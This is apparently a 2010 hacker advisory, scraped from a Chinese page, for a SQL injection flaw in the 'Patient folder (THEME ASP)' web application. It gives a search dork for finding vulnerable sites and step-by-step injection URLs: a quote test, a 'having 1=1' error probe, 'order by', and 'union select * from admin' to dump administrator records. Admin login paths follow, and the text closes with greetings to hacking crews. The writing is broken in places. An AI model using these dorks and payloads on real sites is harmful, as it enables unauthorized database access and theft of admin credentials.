扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 |
============================================================ Patient folder (THEME ASP) Local SQL Injection Vulnerability ============================================================ ----------------------------------- By: SA H4x0r- Emails: ww0@hotmail.com - Date: 2010/05/31- ----------------------------------- ===================================================================== Search: "profil.asp?id=" OR "asp?id=" Author:SA H4x0r Contact: ww0[at]hotmail.com Data: 2010-05-31 ===================================================================== Description: Inject script asp to tell the script to take them infected .. ===================================================================== --=[ Vuln C0de ]=- [-] com/profil.asp?id [-] xxx/xxxxxx.asp?id ----------------------------------------------------------------------------------------- Directions: http://[Site].com/profil.asp?id=1' <<< To show us the site involved or not http://[Site].com/profil.asp?id=1 having 1=1 << Here is a guide on the site downstream Look: [Microsoft][ODBC Microsoft Access Driver] HAVING clause (1=1) without grouping or aggregation. okey ;) http://[Site].com/profil.asp?id=1 order by 1 http://[Site].com/profil.asp?id=1 union select * from admin Control panel: http://[Site].com/admin "OR" http://[Site].com/login ----------------------------------------------------------------------------------------- -=[ P0C ]=- http://127.0.0.1/profile/profil.asp?id=[SQL ASP] http://127.0.0.1/.asp?id=[SQL ASP] =========================| -=[ E0F ]=- |========================= Gr33t'z; Dmar Skood - VirUs_Ra3ch - Mr_QlQ - v4 Team - XP10_HackEr |
体验盒子
